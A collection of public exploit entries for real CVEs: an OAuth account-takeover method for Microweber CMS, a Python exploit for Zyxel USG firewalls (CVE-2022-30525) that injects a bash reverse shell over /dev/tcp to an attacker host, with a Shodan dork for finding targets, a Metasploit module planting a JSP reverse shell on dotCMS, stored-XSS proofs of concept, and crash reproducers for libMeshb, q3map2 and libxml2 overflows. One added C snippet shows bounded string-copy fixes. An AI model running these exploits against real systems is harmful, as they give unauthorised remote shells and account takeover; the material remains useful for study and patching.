<pre><code># Exploit Title: Microweber CMS 1.2.15 - Account Takeover
# Date: 2022-05-09
# Exploit Author: Manojkumar J
# Vendor Homepage: https://github.com/microweber/microweber
# Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15
# Version: <=1.2.15
# Tested on: Windows10
# CVE : CVE-2022-1631

# Description:

Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 OAuth
Misconfiguration Leads To Account Takeover.

# Steps to exploit:

1. Create an account with the victim's email address.

Register endpoint: https://target-website.com/register#

2. When the victim later logs in through one of the default OAuth providers
(Google, GitHub, Microsoft, Twitter, LinkedIn, Telegram, Facebook, etc.)
using that same e-mail address, the OAuth login is linked to the account
created in step 1 instead of a fresh one, so the victim's account can be
accessed with the credentials chosen in step 1.

</code></pre>
<pre><code># Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
# Date: May 18th 2022
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://www.zyxel.com
# Version: ZLD5.00 thru ZLD5.21
# Tested on: Linux
# CVE: CVE-2022-30525


from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import json
import base64
import requests
import argparse


parser = argparse.ArgumentParser(
    prog="CVE-2022-30525.py",
    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")

args = parser.parse_args()

# base64-encoded ASCII-art banner printed at start-up
banner = (
    "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
    "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
    "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
    "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
    "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
    "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
    "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
    "biA6KSApCg=="
)


def main():

    print("\n" + base64.b64decode(banner).decode("utf-8"))

    if None in vars(args).values():
        print("[!] Please enter all parameters !")
        parser.print_help()
        sys.exit()

    if "http" not in args.url:
        args.url = "https://" + args.url
    args.url += "/ztp/cgi-bin/handler"
    exploit(args.url, args.host, args.port)


def exploit(url, host, port):
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
        "Content-Type": "application/json",
    }

    data = {
        "command": "setWanPortSt",
        "proto": "dhcp",
        "port": "4",
        "vlan_tagged": "1",
        "vlanid": "5",
        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
        "data": "hi",
    }
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")

    try:
        response = requests.post(
            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
        )
    except (KeyboardInterrupt, requests.exceptions.Timeout):
        print("[!] Bye Bye hekcer !")
        sys.exit(1)
    finally:
        # A timeout leaves 'response' unassigned, so the NameError path below is
        # what the author uses to signal that the request did not return normally.
        try:
            print("[!] Can't exploit the target ! Code :", response.status_code)

        except:
            print("[!] Enjoy your shell !!!")


if __name__ == "__main__":
    main()

</code></pre>
<pre><code>=====
Intro
=====

libMeshb is a library which supports moving between data types for the Gamma Mesh Format. A buffer overflow was found when parsing the MESH format, and specially crafted .mesh files could allow for arbitrary code execution.

=====
Repro
=====

No magic bytes or valid header are necessary, as the bug appears to be an unbounded fscanf() processing mesh headers.

echo -ne `perl -e 'print "B" x 2176'` > test.mesh

========
Debugger
========

(gdb) r test.mesh /tmp/empty.mesh
Starting program: mesh2poly test.mesh /tmp/empty.mesh

*** stack smashing detected ***: terminated

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50

(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7ddb859 in __GI_abort () at abort.c:79
#2 0x00007ffff7e463ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f7007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff7ee8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7f70064 "stack smashing detected") at fortify_fail.c:26
#4 0x00007ffff7ee8b16 in __stack_chk_fail () at stack_chk_fail.c:24
#5 0x000055555555b5d2 in GmfOpenMesh ()
#6 0x4242424242424242 in ?? ()
#7 0x0000000000000000 in ?? ()

(gdb) exploitable
Description: Stack buffer overflow
Short description: StackBufferOverflow (6/22)
Hash: ea307ff89c1110d6e6c6f565bfc6a9ce.350b4f5ab2938b2eb4fa0a598f3508e1
Exploitability Classification: EXPLOITABLE
Explanation: The target stopped while handling a signal that was generated by libc due to detection of a stack buffer overflow. Stack buffer overflows are generally considered exploitable.
Other tags: PossibleStackCorruption (7/22), AbortSignal (20/22)

This also affects the python wrapper library pymeshb.

>>> import pymeshb
>>> pymeshb.read('test.mesh')
*** stack smashing detected ***: terminated
Aborted (core dumped)

===
Fix
===

libMeshb v7.62

- https://github.com/LoicMarechal/libMeshb/commit/8cd68c54e0647c0030ae4506a225ad4a2655c316

</code></pre>
<pre><code># Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)


#### Exploit Title: Product Show Room Site - 'Telephone' Stored Cross-Site Scripting(XSS)
#### Exploit Author: webraybtl@webray.com.cn inc
#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html
#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code
#### Version: Product Show Room Site 1.0
#### Tested on: Windows Server 2008 R2 Enterprise, Apache, MySQL

#### Description
Persistent XSS (or Stored XSS) is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application. Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in stored XSS.

#### Payload used:
`<script>alert(111)</script>`

#### Proof of Concept

1. Log in to the CMS.
Default Admin Access
Username: admin
Password: admin123

2. Open the page http://172.24.5.107/psrs/admin/?page=system_info/contact_info and click the View button.

3. Put the XSS payload (`<script>alert(111)</script>`) in the Telephone box and click Update to publish the page.
 ![image](https://user-images.githubusercontent.com/60683449/171591851-2068eea2-b789-464f-8afb-9f6b6f8eaedd.png)

4. Open http://172.24.5.107/psrs/?p=contact to view the published page; the alert fires.
 ![image](https://user-images.githubusercontent.com/60683449/171591881-2962a429-f2de-4979-8e27-6fdd8f62c61c.png)




-------


# Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)


#### Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)
#### Exploit Author: webraybtl@webray.com.cn inc
#### Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html
#### Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code
#### Version: Product Show Room Site 1.0
#### Tested on: Windows Server 2008 R2 Enterprise, Apache, MySQL

#### Description
Persistent XSS (or Stored XSS) is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application. Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in stored XSS.

#### Payload used:
`<script>alert(111)</script>`

#### Proof of Concept

1. Log in to the CMS.
Default Admin Access
Username: admin
Password: admin123

2. Open the page http://172.24.5.107/psrs/?p=contact

3. Put the XSS payload (`<script>alert(111)</script>`) in the Message box and click Send Message to publish the page.
 ![image](https://user-images.githubusercontent.com/60683449/171591580-cc3ca01c-9e37-4e05-9351-4b9d7c7749df.png)
 ![image](https://user-images.githubusercontent.com/60683449/171591599-be5e8d7f-1d95-43ad-875a-9884f7052fa6.png)

4. Open http://172.24.5.107/psrs/admin/?page=inquiries and view the first entry on the Inquiries page; the alert fires.
 ![image](https://user-images.githubusercontent.com/60683449/171591660-c12ce9ac-aab1-45e9-b99f-7514dd28f698.png)
</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DotCMS RCE via Arbitrary File Upload.',
        'Description' => %q{
          When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the
          file down in a temp directory. In the case of this vulnerability, dotCMS does not sanitize the filename
          passed in via the multipart request header and thus does not sanitize the temp file's name. This allows a
          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content) that get
          written outside of the dotCMS temp directory. In the case of this exploit, an attacker can upload a special
          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.
        },
        'Author' => [
          'Shubham Shah', # Discovery and analysis
          'Hussein Daher', # Discovery and analysis
          'jheysel-r7' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2022-26352'],
          ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']
        ],
        'Privileged' => false,
        'Platform' => %w[linux win],
        'Targets' => [
          [
            'Java Linux',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'linux'
            }
          ],
          [
            'Java Windows',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'win'
            }
          ]
        ],
        'DisclosureDate' => '2022-05-03',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true,
          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    register_options([
      Opt::RPORT(8443),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    test_content = Rex::Text.rand_text_alpha(10)
    test_file = "#{test_content}.jsp"
    test_path = "../../#{test_file}"
    uuid = Faker::Internet.uuid

    # Self-deleting JSP that echoes a UUID, so the check leaves no file behind.
    jsp = <<~EOS
      <%@ page import=\"java.io.File\" %>
      <%
        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");
        jsp.delete();
      %>
      #{uuid}
    EOS

    vars_form_data = [
      {
        'name' => 'name',
        'data' => jsp,
        'encoding' => nil,
        'filename' => test_path,
        'mime_type' => 'text/plain'
      }
    ]

    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/api/content/'),
      'vars_form_data' => vars_form_data
    )

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, test_file.to_s)
    )

    if res && res.body.include?(uuid)
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def write_jsp_payload
    jsp_path = "../../#{jsp_filename}"
    print_status('Writing JSP payload')
    vars_form_data = [
      {
        'name' => 'name',
        'data' => payload.encoded,
        'encoding' => nil,
        'filename' => jsp_path,
        'mime_type' => 'text/plain'
      }
    ]

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/api/content/'),
      'vars_form_data' => vars_form_data
    )

    unless res&.code == 500
      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')
    end

    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")
    print_good('Successfully wrote JSP payload')
  end

  def execute_jsp_payload
    jsp_uri = normalize_uri(target_uri.path, jsp_filename)
    print_status('Executing JSP payload')
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => jsp_uri
    )

    unless res&.code == 200
      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')
    end
    print_good('Successfully executed JSP payload')
  end

  def exploit
    write_jsp_payload
    execute_jsp_payload
  end

  def jsp_filename
    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"
  end
end
</code></pre>
<pre><code>=====
Intro
=====

GtkRadiant is a cross-platform level editor for idtech game engines such as Quake. It comes with data authoring tools and a BSP map compiler called q3map2 which parses MAP files. The code has been around for a long time and uses unsafe string copy and format functions. A buffer overflow was discovered in the map compiler that occurs when parsing malformed MAP files with large shader image names, which could allow for arbitrary code execution.

Various projects also use or have forked the q3map2 code into their projects, such as DeepMind Lab and other 3D or game related codebases.

=====
Repro
=====

$ echo -ne "\x2f\x2f\x0a\x7b\x0a\x61\x20\x70\x20\x73\x20\x30\x0a\x7b\x0a\x28\x20\x34\x20\x32\x20\x34\x20\x29\x20\x28\x20\x34\x20\x38\x20\x34\x20\x29\x20\x28\x20\x34\x20\x34\x20\x34\x20\x29\x20"`perl -e 'print "B" x 55'`"\x20\x35\x20\x30\x20\x34\x20\x30\x20\x7d\x0a" > crash_sprintf.map

$ xxd crash_sprintf.map
00000000: 2f2f 0a7b 0a61 2070 2073 2030 0a7b 0a28  //.{.a p s 0.{.(
00000010: 2034 2032 2034 2029 2028 2034 2038 2034   4 2 4 ) ( 4 8 4
00000020: 2029 2028 2034 2034 2034 2029 2042 4242   ) ( 4 4 4 ) BBB
00000030: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00000040: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00000050: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00000060: 4242 4242 2035 2030 2034 2030 207d 0a    BBBB 5 0 4 0 }.

$ echo -ne "\x2f\x2f\x0a\x7b\x0a\x61\x20\x70\x20\x73\x20\x30\x0a\x7b\x0a\x28\x20\x34\x20\x32\x20\x34\x20\x29\x20\x28\x20\x34\x20\x38\x20\x34\x20\x29\x20\x28\x20\x34\x20\x34\x20\x34\x20\x29\x20"`perl -e 'print "B" x 64'`"\x20\x35\x20\x30\x20\x34\x20\x30\x20\x7d\x0a" > crash_strcpy.map

$ xxd crash_strcpy.map
00000000: 2f2f 0a7b 0a61 2070 2073 2030 0a7b 0a28  //.{.a p s 0.{.(
00000010: 2034 2032 2034 2029 2028 2034 2038 2034   4 2 4 ) ( 4 8 4
00000020: 2029 2028 2034 2034 2034 2029 2042 4242   ) ( 4 4 4 ) BBB
00000030: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00000040: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00000050: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00000060: 4242 4242 4242 4242 4242 4242 4242 4220 3520  BBBBBBBBBBBBB 5 
00000070: 3020 3420 3020 7d0a                      0 4 0 }.

========
Debugger
========

(gdb) r crash_sprintf.map
Starting program: GtkRadiant/build/release/q3map2/q3map2 crash_sprintf.map
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
2.5.17
threads: 4
Q3Map - v1.0r (c) 1999 Id Software Inc.
Q3Map (ydnar) - v2.5.17
GtkRadiant - v1.6.6 Jan 9 2022 20:51:50
We're still here
VFS Init: /home/test/.q3a/baseq3/
VFS Init: GtkRadiant/build/release//baseq3/

--- BSP ---
Loading crash_sprintf.map
entering crash_sprintf.map
*** buffer overflow detected ***: terminated

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50

(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff78bb859 in __GI_abort () at abort.c:79
#2 0x00007ffff79263ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7a5007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff79c8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7a50012 "buffer overflow detected") at fortify_fail.c:26
#4 0x00007ffff79c73e6 in __GI___chk_fail () at chk_fail.c:28
#5 0x00007ffff791e1cf in _IO_str_chk_overflow (fp=<optimized out>, c=<optimized out>) at iovsprintf.c:35
#6 0x00007ffff792b1a4 in __GI__IO_default_xsputn (n=<optimized out>, data=<optimized out>, f=<optimized out>) at libioP.h:948
#7 __GI__IO_default_xsputn (f=0x7fffffffd680, data=<optimized out>, n=55) at genops.c:370
#8 0x00007ffff791027c in __vfprintf_internal (s=s@entry=0x7fffffffd680, format=format@entry=0x5555555dd35a "textures/%s", ap=ap@entry=0x7fffffffd7c0, mode_flags=mode_flags@entry=6)
    at ../libio/libioP.h:948
#9 0x00007ffff791e279 in __vsprintf_internal (string=0x7fffffffd930 "textures/", 'B' <repeats 54 times>, maxlen=<optimized out>, format=0x5555555dd35a "textures/%s", args=args@entry=0x7fffffffd7c0,
    mode_flags=6) at iovsprintf.c:95
#10 0x00007ffff79c6edb in ___sprintf_chk (s=<optimized out>, flag=<optimized out>, slen=<optimized out>, format=<optimized out>) at sprintf_chk.c:40
#11 0x00005555555a35de in ParseBrush ()
#12 0x00005555555a464f in LoadMapFile ()
#13 0x000055555559b824 in BSPMain ()
#14 0x000055555555f935 in main ()

(gdb) r crash_strcpy.map
...

*** buffer overflow detected ***: terminated

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50

(gdb) bt
#0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff78bb859 in __GI_abort () at abort.c:79
#2 0x00007ffff79263ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7a5007c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff79c8b4a in __GI___fortify_fail (msg=msg@entry=0x7ffff7a50012 "buffer overflow detected") at fortify_fail.c:26
#4 0x00007ffff79c73e6 in __GI___chk_fail () at chk_fail.c:28
#5 0x00007ffff79c6cc6 in __strcpy_chk (dest=0x7fffffffd8f0 "", src=0x5555556af480 <token> 'B' <repeats 64 times>, destlen=64) at strcpy_chk.c:30
#6 0x00005555555a35ab in ParseBrush ()
#7 0x00005555555a464f in LoadMapFile ()
#8 0x000055555559b824 in BSPMain ()
#9 0x000055555555f935 in main ()
</code></pre>
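As an added illustration (not code from the GtkRadiant or libMeshb advisories), the C program below reconstructs the size arithmetic behind the two q3map2 crashes, assuming a 64-byte destination buffer as the `destlen=64` in the __strcpy_chk frame indicates, and shows bounded replacements for the `sprintf("textures/%s")` and `strcpy` calls that reject over-long names as a parse error instead of relying on FORTIFY to abort; the same discipline applies to the unbounded fscanf() in the libMeshb report.

```c
#include <stdio.h>
#include <string.h>

/* Destination size inferred from the strcpy_chk frame above (destlen=64); assumption. */
#define SHADER_PATH_MAX 64
#define TEXTURE_PREFIX  "textures/"

/* Bytes sprintf(dst, "textures/%s", name) writes, terminating NUL included. */
static size_t shader_path_bytes_needed(const char *name)
{
    return strlen(TEXTURE_PREFIX) + strlen(name) + 1;
}

/* Bounded replacement for sprintf(dst, "textures/%s", name): writes nothing and
 * returns -1 when the result would not fit, 0 on success. The explicit check is
 * what turns snprintf's silent truncation into a reportable parse error. */
static int build_shader_path(char *dst, size_t dstlen, const char *name)
{
    if (shader_path_bytes_needed(name) > dstlen)
        return -1;
    snprintf(dst, dstlen, "%s%s", TEXTURE_PREFIX, name);
    return 0;
}

/* Bounded replacement for strcpy(dst, token): copy only if token plus NUL fits. */
static int copy_token(char *dst, size_t dstlen, const char *token)
{
    size_t n = strlen(token);
    if (n + 1 > dstlen)
        return -1;
    memcpy(dst, token, n + 1);
    return 0;
}

/* Build a name of 'count' repeated 'c' characters (like the perl one-liners above). */
static void fill_name(char *out, size_t outlen, char c, size_t count)
{
    if (count >= outlen)
        count = outlen - 1;
    memset(out, c, count);
    out[count] = '\0';
}

/* Run a name of 'count' B's through the bounded path builder; 0 = accepted, -1 = rejected. */
static int try_shader_name(size_t count)
{
    char name[256];
    char path[SHADER_PATH_MAX];
    fill_name(name, sizeof name, 'B', count);
    return build_shader_path(path, sizeof path, name);
}

/* Run a token of 'count' B's through the bounded copy; 0 = accepted, -1 = rejected. */
static int try_token(size_t count)
{
    char token[256];
    char dst[SHADER_PATH_MAX];
    fill_name(token, sizeof token, 'B', count);
    return copy_token(dst, sizeof dst, token);
}

int main(void)
{
    /* 55 B's: 9 + 55 + 1 = 65 bytes, one past the 64-byte buffer (the sprintf crash). */
    printf("55-char shader name: %s\n", try_shader_name(55) ? "rejected" : "accepted");
    printf("54-char shader name: %s\n", try_shader_name(54) ? "rejected" : "accepted");
    /* 64 B's plus NUL is 65 bytes (the strcpy crash); 63 still fits. */
    printf("64-char token: %s\n", try_token(64) ? "rejected" : "accepted");
    printf("63-char token: %s\n", try_token(63) ? "rejected" : "accepted");
    return 0;
}
```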
<pre><code>libxml2: heap-buffer-overflow in xmlBufAdd

libxml2 is vulnerable to a heap-buffer-overflow when xmlBufAdd is called on a very large buffer:
```
int
xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
    unsigned int needSize;

    [..]
    needSize = buf->use + len + 2;                                  (A)
    if (needSize > buf->size){                                      (B)
        [..]
        if (!xmlBufResize(buf, needSize)){
            xmlBufMemoryError(buf, "growing buffer");
            return XML_ERR_NO_MEMORY;
        }
    }

    [..]
    memmove(&buf->content[buf->use], str, len*sizeof(xmlChar));     (C)
    buf->use += len;
    buf->content[buf->use] = 0;
    [..]
}
```

For large buffers with `buf->use` and `buf->size` close to 2**32, the calculation in *A* can overflow, resulting in a small value for needSize. This will skip the reallocation of the buffer in *B* and can lead to an out-of-bounds write in *C*.

One way to trigger this bug is to call `xmlNodeGetContent` on a node with multiple large child elements. This triggers the overflow when `xmlBufGetNodeContent` iterates through its children to add their content to the buffer.

Exploiting this issue using static XML requires that the `XML_PARSE_HUGE` flag is used to disable hardcoded parser limits. If XSLT is used, large nodes can be created dynamically and `XML_PARSE_HUGE` isn't necessary.

_Note: XML_PARSE_HUGE looks very brittle in general. Signed 32-bit integers are widely used as sizes/offsets throughout the codebase, a lot of the helper functions don't handle inputs larger than 4GB correctly and fuzzers won't trigger these edge cases. Maybe that flag should include a security warning? Some security critical projects like xmlsec enable it by default (https://github.com/lsh123/xmlsec/commit/3786af10953630cd2bb2b57ce31c575f025048a8) which seems risky._

Proof of Concept:
XML only (we use --xpath only to trigger a call to xmlNodeGetContent):
```
$ python3 -c 'print("<test>\n" + ("" + "A"*(2**30) + "\n")*4 + "</test>\n")' > /tmp/huge.xml
$ ./xmllint --huge --xpath '/test[string-length() < "4"]' /tmp/huge.xml
=================================================================
==93182==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f0087e0780f at pc 0x00000049c682 bp 0x7ffee51cc270 sp 0x7ffee51cba38
WRITE of size 1073741824 at 0x7f0087e0780f thread T0
    #0 0x49c681 in __asan_memmove (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x49c681)
    #1 0x6ee851 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:908:5
    #2 0x595fdc in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33
    #3 0x5964bf in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c
    #4 0x669c37 in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16
    #5 0x669c37 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8933:16
    #6 0x68de92 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17
    #7 0x68b15e in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13020:22
    #8 0x68a808 in xmlXPathCompOpEvalToBoolean /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13599:6
    #9 0x696974 in xmlXPathNodeSetFilter /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:11674:15
    #10 0x692b36 in xmlXPathNodeCollectAndTest /usr/local/google/home/fwilhelm/code/libxml2/xpath.c
    #11 0x68c6ed in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13115:26
    #12 0x68b61f in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26
    #13 0x679516 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2
    #14 0x679b8d in xmlXPathEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14473:5
    #15 0x4d6858 in doXPathQuery /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2157:11
    #16 0x4d6858 in parseAndPrintFile /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2472:9
    #17 0x4d1bd8 in main /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:3817:7
    #18 0x7f02a712c7ec in __libc_start_main csu/../csu/libc-start.c:332:16
    #19 0x420609 in _start (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x420609)

0x7f0087e0780f is located 0 bytes to the right of 3221225487-byte region [0x7effc7e07800,0x7f0087e0780f)
allocated by thread T0 here:
    #0 0x49d0b3 in __interceptor_realloc (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x49d0b3)
    #1 0x6eddb3 in xmlBufResize /usr/local/google/home/fwilhelm/code/libxml2/buf.c:829:26
    #2 0x6ee7f8 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:902:14
    #3 0x595fdc in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33
    #4 0x5964bf in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c
    #5 0x669c37 in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16
    #6 0x669c37 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8933:16
    #7 0x68de92 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17
    #8 0x68b15e in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13020:22
    #9 0x68a808 in xmlXPathCompOpEvalToBoolean /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13599:6
    #10 0x696974 in xmlXPathNodeSetFilter /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:11674:15
    #11 0x692b36 in xmlXPathNodeCollectAndTest /usr/local/google/home/fwilhelm/code/libxml2/xpath.c
    #12 0x68c6ed in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13115:26
    #13 0x68b61f in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26
    #14 0x679516 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2
    #15 0x679b8d in xmlXPathEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14473:5
    #16 0x4d6858 in doXPathQuery /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2157:11
    #17 0x4d6858 in parseAndPrintFile /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:2472:9
    #18 0x4d1bd8 in main /usr/local/google/home/fwilhelm/code/libxml2/xmllint.c:3817:7
    #19 0x7f02a712c7ec in __libc_start_main csu/../csu/libc-start.c:332:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/google/home/fwilhelm/code/libxml2/xmllint+0x49c681) in __asan_memmove
Shadow bytes around the buggy address:
  0x0fe090fb8eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe090fb8ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe090fb8ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe090fb8ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe090fb8ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe090fb8f00: 00[07]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe090fb8f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe090fb8f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe090fb8f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe090fb8f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe090fb8f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
